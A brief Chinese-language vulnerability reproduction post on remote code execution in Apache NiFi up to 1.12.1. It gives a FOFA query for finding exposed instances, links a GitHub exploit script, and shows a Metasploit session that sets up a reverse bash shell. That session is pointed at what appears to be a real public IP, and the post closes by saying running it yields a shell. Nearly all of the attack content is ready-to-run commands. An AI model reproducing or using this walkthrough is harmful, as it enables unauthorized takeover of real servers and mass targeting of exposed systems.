漏洞简介

Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。
 
        

影响版本

Apache NiFi  <= 1.12.1
 
 

FOFA

"nifi" && title=="NiFi"

 
 

漏洞复现

脚本

https://github.com/imjdl/Apache-NiFi-Api-RCE


 

msf进行攻击

msf6 > use exploit/multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash

msf6 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.60.7
lhost => 0.0.0.0
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rhosts 目标ip
rhosts => 74.208.80.242
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rport 目标端口
rport => 9090
msf6 exploit(multi/http/apache_nifi_processor_rce) > run






执行run,开始攻击,获取shell。